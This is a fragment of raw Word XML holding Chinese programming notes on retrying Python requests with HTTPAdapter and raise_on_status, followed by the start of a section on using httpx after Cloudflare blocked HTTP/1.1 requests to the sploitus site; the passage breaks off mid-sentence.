    <w:p w14:paraId="6300F19E" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>adapter = HTTPAdapter(max_retries=retries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364223C0" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22623F10" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTPAdapter </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象挂载到</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象上，适用于所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> http:// </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> https:// </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A1923" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>session.mount('http://', adapter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9984E2" w14:textId="6803E6FF" w:rsidR="0012170C" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>session.mount('https://', adapter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B338E97" w14:textId="77777777" w:rsidR="00B36C15" w:rsidRDefault="00B36C15" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="688B971C" w14:textId="78C1BB18" w:rsidR="0012170C" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用带有重试机制的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象发送请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E30F22D" w14:textId="77777777" w:rsidR="0012170C" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>response = session.get('http://example.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C77C7E" w14:textId="77777777" w:rsidR="0012170C" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFFC6F0" w14:textId="77777777" w:rsidR="0012170C" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，我们首先创建了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象和一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象。然后，我们创建了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTPAdapter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，并将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象作为参数传入。最后，我们将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTPAdapter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象挂载到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象上，然后使用这个带有重试机制的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象发送请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087FC4E0" w14:textId="77777777" w:rsidR="0012170C" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B3E8533" w14:textId="77777777" w:rsidR="0094512B" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，这个示例只会</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对一些特定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>状态码进行重试（例如，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>502</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>503</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>504</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6043A074" w14:textId="71974DF7" w:rsidR="0094512B" w:rsidRPr="0094512B" w:rsidRDefault="0094512B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094512B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这里的异常处理，包括网络</w:t>
      </w:r>
      <w:r w:rsidRPr="0094512B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="0094512B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>奇怪的失败，以及这个元组中定义的正常返回的响应码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55958D6E" w14:textId="77777777" w:rsidR="0094512B" w:rsidRDefault="0094512B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12777B9F" w14:textId="1D6F657F" w:rsidR="0012018F" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你希望对其他的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态码或网络错误进行重试，你可能需要调整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的设置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F34461F" w14:textId="77777777" w:rsidR="0012018F" w:rsidRDefault="0012018F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FCD0E35" w14:textId="48A6B20A" w:rsidR="001D017A" w:rsidRDefault="001D017A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>raise_on_status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA6C76" w14:textId="77777777" w:rsidR="001D017A" w:rsidRDefault="001D017A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">raise_on_status=False </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> urllib3.util.retry.Retry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类初始化时的一个参数。它的作用是在重试请求后，如果收到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态码仍然是一个我们设置在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> status_forcelist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数中的状态码，那么是否抛出一个异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541FC441" w14:textId="77777777" w:rsidR="001D017A" w:rsidRDefault="001D017A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B8E633" w14:textId="77777777" w:rsidR="001D017A" w:rsidRDefault="001D017A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> raise_on_status=True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（这是默认设置），那么当我们在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> status_forcelist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数中指定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态码出现时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Retry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会抛出一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MaxRetryError </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常。如果你没有捕获这个异常，那么程序就会在这里停止。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6424A6" w14:textId="77777777" w:rsidR="001D017A" w:rsidRDefault="001D017A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55DE99EB" w14:textId="77777777" w:rsidR="001D017A" w:rsidRDefault="001D017A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> raise_on_status=False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将不会抛出异常，而是返回请求的结果，即使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态码是我们在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> status_forcelist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数中指定的状态码。这意味着你的代码可以继续运行，即使请求没有成功。你可以检查请求的结果，看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态码是否是你期望的状态码，如果不是，你可以决定怎么处理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C3AD41" w14:textId="77777777" w:rsidR="001D017A" w:rsidRDefault="001D017A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB3D086" w14:textId="08DA6B23" w:rsidR="00B4309F" w:rsidRDefault="001D017A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在某些情况下，你可能想让代码在遇到错误时继续运行，而不是立即停止。例如，你可能正在爬取多个网页，即使某个网页出现了错误，你也希望继续爬取其他的网页。这时候，你可以设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> raise_on_status=False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，让代码在遇到错误时继续运行。但是请注意，你应该检查请求的结果，确保它是你期望的结果，如果不是，你应该在代码中处理这种情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D53263" w14:textId="11FADCBB" w:rsidR="00F45268" w:rsidRDefault="00F45268" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537AE9B2" w14:textId="77777777" w:rsidR="00815BB0" w:rsidRDefault="00815BB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773641E9" w14:textId="6B3C03F4" w:rsidR="00815BB0" w:rsidRDefault="00647F69" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="608" w:name="_Toc159780041"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>httpx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="608"/>
    </w:p>
    <w:p w14:paraId="3ECAA2DF" w14:textId="615B4413" w:rsidR="00815BB0" w:rsidRDefault="007C2CD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在比瓴爬</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库的时候，我遇到了非常神秘的玄学问题，在鹏哥帮助下终于解决了这个问题。在于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强制</w:t>
      </w:r>
      <w:r w:rsidR="00FF674F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00FF674F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00FF674F">
        <w:t>2.0</w:t>
      </w:r>
      <w:r w:rsidR="00FF674F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，拒绝使用</w:t>
      </w:r>
      <w:r w:rsidR="00FF674F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00FF674F">
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidR="00FF674F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，导致</w:t>
      </w:r>
      <w:r w:rsidR="005B4E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cloud</w:t>
      </w:r>
      <w:r w:rsidR="005B4E0B">
        <w:t>flare</w:t>
      </w:r>
      <w:r w:rsidR="005B4E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D20F1" w14:textId="75C3950C" w:rsidR="00DC3841" w:rsidRPr="00A50AAE" w:rsidRDefault="00DC3841" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>TTP2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，只支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1.1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B7FD61" w14:textId="0521EF84" w:rsidR="00DC3841" w:rsidRPr="00A50AAE" w:rsidRDefault="00DC3841" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>urp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>会自行按照网站要求更换不兼容</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的网站的头部信息，如将请求头的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>换为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
